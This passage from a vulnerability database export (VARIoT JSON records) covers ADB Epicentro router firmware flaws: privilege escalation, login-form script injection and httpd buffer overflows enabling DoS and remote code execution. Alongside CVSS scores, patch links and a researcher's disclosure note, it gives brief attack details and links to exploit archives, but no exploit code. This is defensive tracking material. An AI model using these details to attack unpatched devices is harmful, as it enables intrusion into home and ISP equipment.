"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201807-442",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2018-12782",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-123137",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-12782"
},
{
"db": "VULHUB",
"id": "VHN-123137"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-007689"
},
{
"db": "NVD",
"id": "CVE-2018-13110"
},
{
"db": "CNNVD",
"id": "CNNVD-201807-442"
}
]
},
"id": "VAR-201807-1047",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-12782"
},
{
"db": "VULHUB",
"id": "VHN-123137"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-12782"
}
]
},
"last_update_date": "2023-12-18T13:28:50.326000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.adbglobal.com/"
},
{
"title": "Patch for ADBBroadbandGateways/Routers Privilege Escalation Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/133903"
},
{
"title": "ADB broadband gateways/routers on Epicentro platform Fixes for permission permissions and access control vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=81863"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-12782"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-007689"
},
{
"db": "CNNVD",
"id": "CNNVD-201807-442"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-732",
"trust": 1.1
},
{
"problemtype": "CWE-264",
"trust": 0.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-123137"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-007689"
},
{
"db": "NVD",
"id": "CVE-2018-13110"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.1,
"url": "http://packetstormsecurity.com/files/148430/adb-group-manipulation-privilege-escalation.html"
},
{
"trust": 2.3,
"url": "http://seclists.org/fulldisclosure/2018/jul/19"
},
{
"trust": 2.3,
"url": "https://www.exploit-db.com/exploits/44984/"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/archive/1/542118/100/0/threaded"
},
{
"trust": 1.7,
"url": "https://www.sec-consult.com/en/blog/advisories/privilege-escalation-via-linux-group-manipulation-in-all-adb-broadband-gateways-routers/"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-13110"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-13110"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-12782"
},
{
"db": "VULHUB",
"id": "VHN-123137"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-007689"
},
{
"db": "NVD",
"id": "CVE-2018-13110"
},
{
"db": "CNNVD",
"id": "CNNVD-201807-442"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-12782"
},
{
"db": "VULHUB",
"id": "VHN-123137"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-007689"
},
{
"db": "NVD",
"id": "CVE-2018-13110"
},
{
"db": "CNNVD",
"id": "CNNVD-201807-442"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-07-10T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-12782"
},
{
"date": "2018-07-06T00:00:00",
"db": "VULHUB",
"id": "VHN-123137"
},
{
"date": "2018-09-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-007689"
},
{
"date": "2018-07-06T14:29:01.163000",
"db": "NVD",
"id": "CVE-2018-13110"
},
{
"date": "2018-07-09T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201807-442"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-07-10T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-12782"
},
{
"date": "2019-10-03T00:00:00",
"db": "VULHUB",
"id": "VHN-123137"
},
{
"date": "2018-09-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-007689"
},
{
"date": "2019-10-03T00:03:26.223000",
"db": "NVD",
"id": "CVE-2018-13110"
},
{
"date": "2019-10-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201807-442"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201807-442"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural ADB Vulnerabilities related to authorization, authority, and access control in broadband gateways and routers",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-007689"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "permissions and access control issues",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201807-442"
}
],
"trust": 0.6
}
}
VAR-201810-1458
Vulnerability from variot - Updated: 2023-12-18 13:23Code injection in the /ui/login form Language parameter in Epicentro E_7.3.2+ allows attackers to execute JavaScript code by making a user issue a manipulated POST request. Epicentro Contains a code injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. ADBEpicentro is a set of firmware used by ADB in Switzerland for use in ADB gateways and routers. CVE-2018-7633 Script Injection in ADB EpiCentro 7.3.2+ login form language parameter https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7633 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7633 Product: EpiCentro Vendor: ADB Global Tested Version: 7.3.2 CVE ID: 2018-7633 Severity: medium Severity Rating: CVSS v3 Base Score: 5,4 AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N Impact: Execution of injected Javascript Locally Exploitable: no Remotely Exploitable: Yes Explanation: https://fschallock.wordpress.com/2018/10/08/cve-2018-7633-script-injection-in-the-login-form-language-parameter-of-adb-firmware-epicentro-7-3-2/ https://fschallock.wordpress.com/2018/10/08/cve-2018-7633-script-injection-in-the-login-form-language-parameter-of-adb-firmware-epicentro-7-3-2/
-
CVE-2018-7632 Buffer Overflow in ADB EpiCentro 7.3.2+ httpd leading to a Denial of Service condition https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7632 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7632 Product: EpiCentro Vendor: ADB Global Tested Version: 7.3.2 CVE ID: 2018-7632 Severity: severe Severity Rating: CVSS v3 Base Score: 7,5 AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H Impact: Denial of Service Locally Exploitable: no Remotely Exploitable: Yes Explanation: https://fschallock.wordpress.com/2018/10/08/cve-2018-7632-buffer-overflow-in-httpd-in-epicentro-e_7-3-2-allows-attackers-to-cause-a-denial-of-service-attack-remotely-via-a-specially-crafted-get-request/ https://fschallock.wordpress.com/2018/10/08/cve-2018-7632-buffer-overflow-in-httpd-in-epicentro-e_7-3-2-allows-attackers-to-cause-a-denial-of-service-attack-remotely-via-a-specially-crafted-get-request/
-
CVE-2018- 7631 Buffer Overflow in ADB EpiCentro 7.3.2+ httpd leading to Remote Code Execution (RCE) https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7632 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7632 Product: EpiCentro Vendor: ADB Global Tested Version: 7.3.2 CVE ID: 2018-7631 Severity: critical Severity Rating: CVSS v3 Base Score: 10,0 AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H Impact: Code Execution Locally Exploitable: no Remotely Exploitable: Yes
Explanation: https://fschallock.wordpress.com/2018/10/07/cve-2018-7631-rce-in-adb-epicentro-7-3-2-httpd/ https://fschallock.wordpress.com/2018/10/07/cve-2018-7631-rce-in-adb-epicentro-7-3-2-httpd/
The vulnerabilities were discovered and disclosed to the manufacturer ADB and the ISP A1 Telekom Austria prior to general public announcement. In accordance to information received from both parties a fix has been produced and rolled out to all customers / devices. I have not examined the fix and therefore can not comment on its effectivity.
Felix
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201810-1458",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "epicentro",
"scope": "eq",
"trust": 1.6,
"vendor": "adbglobal",
"version": "7.3.2"
},
{
"model": "epicentro",
"scope": "eq",
"trust": 0.8,
"vendor": "adb",
"version": "7.3.2"
},
{
"model": "epicentro e 7.3.2+",
"scope": null,
"trust": 0.6,
"vendor": "adb",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-20757"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-011644"
},
{
"db": "NVD",
"id": "CVE-2018-7633"
},
{
"db": "CNNVD",
"id": "CNNVD-201810-489"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:adbglobal:epicentro:7.3.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-7633"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Felix Schallock",
"sources": [
{
"db": "PACKETSTORM",
"id": "149976"
}
],
"trust": 0.1
},
"cve": "CVE-2018-7633",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2018-7633",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 6.4,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2018-20757",
"impactScore": 4.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-7633",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-7633",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "CNVD",
"id": "CNVD-2018-20757",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201810-489",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-20757"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-011644"
},
{
"db": "NVD",
"id": "CVE-2018-7633"
},
{
"db": "CNNVD",
"id": "CNNVD-201810-489"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Code injection in the /ui/login form Language parameter in Epicentro E_7.3.2+ allows attackers to execute JavaScript code by making a user issue a manipulated POST request. Epicentro Contains a code injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. ADBEpicentro is a set of firmware used by ADB in Switzerland for use in ADB gateways and routers. CVE-2018-7633 Script Injection in ADB EpiCentro 7.3.2+ login form language parameter https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7633 \u003chttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7633\u003e \nProduct: EpiCentro\nVendor: ADB Global\nTested Version: 7.3.2\nCVE ID: 2018-7633\nSeverity: medium\nSeverity Rating: CVSS v3 Base Score: 5,4 AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N\nImpact: Execution of injected Javascript\nLocally Exploitable: no\nRemotely Exploitable: Yes\nExplanation: https://fschallock.wordpress.com/2018/10/08/cve-2018-7633-script-injection-in-the-login-form-language-parameter-of-adb-firmware-epicentro-7-3-2/ \u003chttps://fschallock.wordpress.com/2018/10/08/cve-2018-7633-script-injection-in-the-login-form-language-parameter-of-adb-firmware-epicentro-7-3-2/\u003e \n\n2. CVE-2018-7632 Buffer Overflow in ADB EpiCentro 7.3.2+ httpd leading to a Denial of Service condition https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7632 \u003chttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7632\u003e \nProduct: EpiCentro\nVendor: ADB Global\nTested Version: 7.3.2\nCVE ID: 2018-7632\nSeverity: severe\nSeverity Rating: CVSS v3 Base Score: 7,5 AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\nImpact: Denial of Service\nLocally Exploitable: no\nRemotely Exploitable: Yes\nExplanation: https://fschallock.wordpress.com/2018/10/08/cve-2018-7632-buffer-overflow-in-httpd-in-epicentro-e_7-3-2-allows-attackers-to-cause-a-denial-of-service-attack-remotely-via-a-specially-crafted-get-request/ \u003chttps://fschallock.wordpress.com/2018/10/08/cve-2018-7632-buffer-overflow-in-httpd-in-epicentro-e_7-3-2-allows-attackers-to-cause-a-denial-of-service-attack-remotely-via-a-specially-crafted-get-request/\u003e\n\n3. CVE-2018- 7631 Buffer Overflow in ADB EpiCentro 7.3.2+ httpd leading to Remote Code Execution (RCE) https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7632 \u003chttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7632\u003e \nProduct: EpiCentro\nVendor: ADB Global\nTested Version: 7.3.2\nCVE ID: 2018-7631\nSeverity: critical\nSeverity Rating: CVSS v3 Base Score: 10,0 AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\nImpact: Code Execution\nLocally Exploitable: no\nRemotely Exploitable: Yes\n\nExplanation: https://fschallock.wordpress.com/2018/10/07/cve-2018-7631-rce-in-adb-epicentro-7-3-2-httpd/ \u003chttps://fschallock.wordpress.com/2018/10/07/cve-2018-7631-rce-in-adb-epicentro-7-3-2-httpd/\u003e \n\nThe vulnerabilities were discovered and disclosed to the manufacturer ADB and the ISP A1 Telekom Austria prior to general public announcement. In accordance to information received from both parties a fix has been produced and rolled out to all customers / devices. I have not examined the fix and therefore can not comment on its effectivity. \n\nFelix\n\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-7633"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-011644"
},
{
"db": "CNVD",
"id": "CNVD-2018-20757"
},
{
"db": "PACKETSTORM",
"id": "149976"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-7633",
"trust": 3.1
},
{
"db": "JVNDB",
"id": "JVNDB-2018-011644",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2018-20757",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201810-489",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "149976",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-20757"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-011644"
},
{
"db": "PACKETSTORM",
"id": "149976"
},
{
"db": "NVD",
"id": "CVE-2018-7633"
},
{
"db": "CNNVD",
"id": "CNNVD-201810-489"
}
]
},
"id": "VAR-201810-1458",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-20757"
}
],
"trust": 1.6
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-20757"
}
]
},
"last_update_date": "2023-12-18T13:23:55.745000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.adbglobal.com/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-011644"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-94",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-011644"
},
{
"db": "NVD",
"id": "CVE-2018-7633"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.1,
"url": "https://fschallock.wordpress.com/2018/10/08/cve-2018-7633-script-injection-in-the-login-form-language-parameter-of-adb-firmware-epicentro-7-3-2/"
},
{
"trust": 0.9,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7633"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-7633"
},
{
"trust": 0.1,
"url": "https://fschallock.wordpress.com/2018/10/08/cve-2018-7632-buffer-overflow-in-httpd-in-epicentro-e_7-3-2-allows-attackers-to-cause-a-denial-of-service-attack-remotely-via-a-specially-crafted-get-request/"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7632\u003e"
},
{
"trust": 0.1,
"url": "https://fschallock.wordpress.com/2018/10/07/cve-2018-7631-rce-in-adb-epicentro-7-3-2-httpd/\u003e"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-7632"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-7631"
},
{
"trust": 0.1,
"url": "https://fschallock.wordpress.com/2018/10/08/cve-2018-7633-script-injection-in-the-login-form-language-parameter-of-adb-firmware-epicentro-7-3-2/\u003e"
},
{
"trust": 0.1,
"url": "https://fschallock.wordpress.com/2018/10/08/cve-2018-7632-buffer-overflow-in-httpd-in-epicentro-e_7-3-2-allows-attackers-to-cause-a-denial-of-service-attack-remotely-via-a-specially-crafted-get-request/\u003e"
},
{
"trust": 0.1,
"url": "https://fschallock.wordpress.com/2018/10/07/cve-2018-7631-rce-in-adb-epicentro-7-3-2-httpd/"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7633\u003e"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7632"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-20757"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-011644"
},
{
"db": "PACKETSTORM",
"id": "149976"
},
{
"db": "NVD",
"id": "CVE-2018-7633"
},
{
"db": "CNNVD",
"id": "CNNVD-201810-489"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-20757"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-011644"
},
{
"db": "PACKETSTORM",
"id": "149976"
},
{
"db": "NVD",
"id": "CVE-2018-7633"
},
{
"db": "CNNVD",
"id": "CNNVD-201810-489"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-10-12T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-20757"
},
{
"date": "2019-01-18T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-011644"
},
{
"date": "2018-10-26T23:22:22",
"db": "PACKETSTORM",
"id": "149976"
},
{
"date": "2018-10-09T22:29:02.047000",
"db": "NVD",
"id": "CVE-2018-7633"
},
{
"date": "2018-10-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201810-489"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-10-12T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-20757"
},
{
"date": "2019-01-18T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-011644"
},
{
"date": "2018-12-10T17:33:50.297000",
"db": "NVD",
"id": "CVE-2018-7633"
},
{
"date": "2018-10-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201810-489"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201810-489"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ADB Epicentro Code Injection Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-20757"
},
{
"db": "CNNVD",
"id": "CNNVD-201810-489"
}
],
"trust": 1.2
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "code injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201810-489"
}
],
"trust": 0.6
}
}
VAR-201810-1456
Vulnerability from variot - Updated: 2023-12-18 13:23Buffer Overflow in httpd in EpiCentro E_7.3.2+ allows attackers to execute code remotely via a specially crafted GET request without a leading "/" and without authentication. Epicentro Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. ADBEpicentro is a set of firmware used by ADB in Switzerland for use in ADB gateways and routers. Httpd is one of the HTTP servers. A buffer overflow vulnerability exists in httpd in the ADBEpicentroE_7.3.2+ release. CVE-2018-7633 Script Injection in ADB EpiCentro 7.3.2+ login form language parameter https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7633 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7633 Product: EpiCentro Vendor: ADB Global Tested Version: 7.3.2 CVE ID: 2018-7633 Severity: medium Severity Rating: CVSS v3 Base Score: 5,4 AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N Impact: Execution of injected Javascript Locally Exploitable: no Remotely Exploitable: Yes Explanation: https://fschallock.wordpress.com/2018/10/08/cve-2018-7633-script-injection-in-the-login-form-language-parameter-of-adb-firmware-epicentro-7-3-2/ https://fschallock.wordpress.com/2018/10/08/cve-2018-7633-script-injection-in-the-login-form-language-parameter-of-adb-firmware-epicentro-7-3-2/
-
